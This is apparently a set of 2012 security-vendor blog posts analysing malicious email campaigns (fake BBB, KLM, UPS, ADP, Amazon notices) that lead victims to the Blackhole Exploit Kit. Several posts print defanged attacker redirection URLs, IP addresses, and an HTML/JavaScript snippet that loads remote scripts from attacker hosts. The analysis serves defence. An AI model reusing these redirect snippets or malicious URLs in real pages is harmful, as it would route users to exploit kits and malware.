U.S. and Canadian businesses looking to maintain their reputation and effectively handle customer disputes are once again being targeted by another barrage of malicious BBB (Better Business Bureau) complaint notifications.

While BBB campaigns have been circulating for a good many years, for example this 2008 certificate scam, the Websense® ThreatSeeker® Network has detected and intercepted a marked increase in BBB malicious email this month. Earlier in September, the ThreatSeeker Network protected customers and continues to protect them from thousands of malicious email each day. Today, with this exponential growth, it is now protecting our customers from hundreds of thousands of BBB messages per hour!

In an attempt to look authentic, the messages include an official graphic from the BBB Web site but, as is often the case with malicious email campaigns, they also include suspicious grammar: "about your company possible involvement in check cashing and Money Order Scam."

Additionally, a number of different subjects have been utilized for this campaign, presumably in an attempt to thwart detection, including random "Complaint IDs," which you can see in the following sample set:

As with other similar malicious campaigns with themes relating to ADP, Twitter, and LinkedIn,  the techniques, tools and redirection path that are used are pretty much the same. Tools like the Cutwail spambot and Blackhole exploit kit  seem to be the main weapons used by cybercriminals in malicious spam nowadays.

Redirection paths:

1) hxxp://vargasvilcolombia.com/PykKDZe/index.html

2)<html>

<h1>WAIT PLEASE</h1>

<h3>Loading...</h3>

<script type="text/javascript" src="hxxp://pst.org.br/Wi4aFSLZ/js.js"></script>

<script type="text/javascript" src="hxxp://www.adahali.com/NQ9Ba2ap/js.js"></script>

</html>

3) document.location='hxxp://108.178.59.11/links/deep_recover-result.php';

(Please refer to our previous blog post to learn more about the landing page)

As is very common these days, the payload for this particular campaign is the recently updated BlackHole Exploit Kit v 2.0. More information about the malware files that gets pushed to the computer can be found in our ThreatScope reports:

ThreatScope report for initial file

ThreatScope report for additional payload

Fake airline e-ticket emails containing malicious attachments are far from new. However, the Websense® ThreatSeeker® Network has detected a significant campaign purporting to originate from KLM, the Dutch flagship airline. We estimate we intercepted more than 850,000 messages from this campaign on Monday, September 17, alone.

Each malicious message, with a subject 'KLM e-Ticket', appears to use a legitimate KLM e-ticket layout, but itinerary information is not displayed. Instead, users are enticed to view the itinerary in an attachment and subsequently risk compromising their machines. Although this scam does not specifically target KLM customers, those who have made recent ticket purchases as well as recipients who may fear that an unauthorized credit card purchase has been made could fall victim. Websense customers are protected from this and other threats by ACE™, our Advanced Classification Engine.

We analyzed a sample set of messages, and noted that each 'e-ticket' contained unique values in the passenger and receipt sections (presumably an attempt to avoid detection), along with a malicious zipped attachment named 'KLM-e-Ticket_<NumericalValue>.zip'.

Two different malicious binaries have been extracted from the attachments in this campaign. Both binaries are named 'KLM-e-Ticket.pdf.exe' and both allow remote shell (command line) access to the compromised machine via telnet to port 8000. Although both of these binaries are attempting to trick users into believing that the file is a PDF file, neither uses an Adobe Reader or similar icon!

It is worth noting that the same binaries have been used in recent 'Microsoft Services Agreement' and 'Telstra Online Account' campaigns based on submitted filenames.

Websense ThreatScope™, our online sandbox, also flags the files' behavior as suspicious: http://aceinsight.websense.com/fileanalysisreport.aspx?rid=91198D21288F4CE384D7D80D983A1E86

The first batch of iPhone 5s will be delivered on Friday of this week. Apple sold more than 2 million of the new phone in less than 24 hours so clearly there's a huge interest in getting the device. This means that many people are eagerly waiting for their shipping notifications, to learn when the phone will arrive. I'm one of the people who pre-ordered an iPhone 5, and I'm still waiting for my delivery notification. From reading discussion forums online, I know that all orders from Apple's online store will ship with UPS. So when I received a UPS notification email today, I obviously expected it to be about my iPhone. Turns out, it wasn't.

Instead the email contained an attached HTML page that, when loaded, displayed the page below:

When I look at the emails monitored by our Cloud Email Security service, I can see that we've intercepted and blocked over 45,000 emails similar to this one. UPS/FedEx lures are not new, but in times like this -- when people are eagerly waiting for an email of this type -- the risk is great that recipients will have their guards down and will run the attached file.

The page above isn't as innocent as it looks. There's a hidden, obfuscated script on the page that deobfuscates to this:

We can see that it loads an iframe from a .RU domain, which is a Blackhole Exploit Kit site that pushes a banking trojan to the PC. See our ThreatScope report for more information and hashes. On a side note, the phrase used for the .RU domain name translates to "money on account". Banking trojan, money on account... there's no doubt that the motivation for this exploit is financial!

Our recommendation is to be extra careful if you're waiting for a delivery notification, and don't run any attachments contained in those types of emails.

A new vulnerability found in Microsoft Internet Explorer affects Internet Explorer versions 6, 7, 8, and 9. The vulnerability allows attackers to execute code on a machine by just having the user visit a malicious website. This can happen, for example, when the user is tricked into clicking a link in an email or via compromised legitimate websites.

The vulnerability itself lies in the way that Internet Explorer accesses an object that has been deleted or not properly allocated. This vulnerability has now been listed by Metasploit, which means it is available publicly, and we anticipate that we'll soon see this Internet Explorer vulnerability used in broader attacks. More information about the vulnerability can be found in this Microsoft Advisory 2757760.

We have released updates to the real-time analytics of ACE™, our Advanced Classification Engine, which means that Websense customers are protected. As a member of the Microsoft Active Protection Program (MAPP), we are also working with Microsoft to monitor this situation.

UPDATE:

On Friday September 21, 2012, Microsoft released an out-of-band patch MS12-063 to address this vulnerability. The above vulnerability, documented as CVE-2012-4969 was addressed along with 4 other vulnerabilities affecting Internet Explorer.  We recommend that you apply this patch to your environment as soon as possible.

Since Blackhole Exploit Kit 2.0 was recently introduced, we wanted to give our readers a few examples of how they might get exposed to this threat through email.

Websense® ThreatSeeker® Network has recently intercepted a few malicious email campaigns that try to lure the victims to Web pages that host this popular exploit kit. Some of the themes were new to us and some familiar.

One posed as voice mail notifications from Microsoft Exchange servers, another mimicked ADP invoice reminders, and a third thanked the recipient for signing up for a premium service of accountingWEB.com. Like other malicious social engineering campaigns, these email campaigns try to lure victims to click links that ultimately lead to pages hosting Blackhole Exploit Kit. A lot of the email messages pretend to come from trusted sources (well-known establishments, or the victim's own infrastructure), and try to catch the reader off-guard by focusing their attention on something urgent, like money matters.

Websense customers are protected from these threats by ACE™, our Advanced Classification Engine.

The malicious emails contain links that redirect to Blackhole pages with new obfuscation, but we don't think these are Blackhole 2.0. We suspect it won't be long, though, until we come across similar campaigns that use the new version.

ADP is one the largest names in payroll services, so it's no surprise that a spoofed ADP notification email is used as a lure.

Here's an example marked as high priority, with the subject line "ADP Invoice Reminder":

Let's follow one of the possible redirection paths:

hxxp://allbarswireless.com/HXwcDdQ/index.html
hxxp://ash-polynesie.com/AjVSXvus/js.js
hxxp://108.60.141.7/tfvsfios6kebvras.php?r=dwtd6xxjpq8tkatb
hxxp://108.60.141.7/links/differently-trace.php

Please refer to our previous blog post to learn more about the landing page.

Here's a different lure - emails pretending to come from the victim's Exchange server, telling them that they have new voice mail. The text invites the reader to click the link: "Double click on the link to listen the message."

 Subject lines include "Voice Mail from NNN-NNN-NNNN (NN seconds)":

The redirection chain here is similar:

hxxp://www.tryakbar.com/tLbM3r/index.html
hxxp://sportmania.so/JP3q2538/js.js
hxxp://173.255.221.74/tfvsfios6kebvras.php?r=rs3mwhukafbiamcm

The landing page shows similar content to the previous example. See here.

Another scheme thanks the user for signing up for a premium service.

Subject lines include "Thank you for activating paid services":

Different redirection chain, but the landing page hosts Blackhole, with a very familiar path:

hxxp://www.svstk.ru/templates/beez/check.php
hxxp://bode-sales.net/main.php?page=3c23940fb7350489

And finally, the familiar theme of FDIC notifications claiming your wire transfer ability was suspended.

Subject lines include "You need a new security version," "Suspended transactions," and "Urgent! You must install a new security version!"

Here again, simple redirection leads to typical "/main.php?page=" type URLs.

hxxp://kahvikuppi.org/achsec.html
hxxp://afgreenwich.net/main.php?page=0f123fe645ddf8d7

Note that as part of the update to Blackhole 2.0, we are much more likely to see URLs like those used in the first two examples, rather than the latter two, due to the dynamic URL generation capability.

Here at Websense Security Labs, we like to keep our ears to the ground to listen carefully for new threats.  Yesterday, another researcher blog announced that there was a new version of the infamous Blackhole Exploit Kit.  The advertisement for the new version of Blackhole was posted on an underground forum and was written in Russian.  For those of you who may be unaware, Blackhole is by far the most popular web-based exploit kit in the black market to date. 

A few of the interesting updates to the exploit kit are noted here:

1. Dynamic URL generation, so there is no longer a standard URL pattern that could be used to identify the kit.
2. IP blocking at the executable URL, so that AV companies can't just download your binary. This is meant to slow down AV detection.
3. Use of Captcha in the admin panel login page, to prevent brute forcing unauthorized access.

For a full listing of updates, you can view the English translated advertisement here.

We put some feelers out in our ThreatSeeker network, to see what we could find and determine if there were any changes in the code that Blackhole uses.  Sure enough, we found some malicious links in a recent email campaign that lead to Blackhole with new obfuscation.  The creator of this kit changes the obfuscation as often as a model changes clothes at a fashion show!  

That being said, we can't confirm that this example is in fact version 2.0, but it won't be much of a surprise to see a new version of this kit using this new obfuscation.  From the looks of the de-obfuscated code below, this one may not be 2.0.  Notice the use of PluginDetect on line 5; the advertisement states that the author no longer uses this.  

Websense® ThreatSeeker® Network is constantly on the lookout for threats like this, so that we can protect our customers using ACE™, our Advanced Classification Engine.

Following our recent blog posts regarding the propagation of Java vulnerability CVE-2012-4681 (New Java 0-day used in small number of attacks) and its subsequent inclusion in the infamous Blackhole Exploit Kit (New Java 0-day added to Blackhole Exploit Kit),  the Websense® ThreatSeeker® Network has detected a new malicious email campaign purporting to be an order verification email from Amazon directing victims to a page containing the recent Java exploit.

If successful, this exploit could allow the cyber-criminals behind this campaign to deliver further malicious payloads to the victim’s machine which, for example, could lead to the exfiltration of personal and financial data.

Oracle have released an out-of-band patch for this Java vulnerability (Oracle release Java 1.7.0_07 to fix CVE-2012-4681) and Websense customers are protected from this and other threats by ACE™, our Advanced Classification Engine.

On 1^st September, Websense® ThreatSeeker® Network intercepted over 10,000 malicious emails with the subject ‘You Order With Amazon.com’ enticing the recipient to ‘click here’ to verify a fictitious order as shown in this sample:   

Once the victim has clicked the link, they are redirected to an obfuscated page hosting the Blackhole Exploit Kit – in this case, hxxp://atjoviygdm.dnset.com/main.php?page=8e2cf5bb67d777a4 . The Payload view below highlights the Java Archive ‘Leh.jar’ which is then used to exploit CVE-2012-4681 should the victim’s machine be vulnerable, an analysis of this file can also be found on VirusTotal.

The obfuscated JavaScript above (de-obfuscated version below) attempts to profile the visiting machine, such as determining the browser type and version as well as the Adobe Flash, Adobe Reader and Java versions, and then based on this information selects the ‘best’ exploit to use against this particular victim.   

This email campaign further illustrates the ingenuity and speed at which cyber-criminals package and propagate malicious content along with social-engineering techniques in order to exploit both recent software vulnerabilities and the trusting nature of end-users.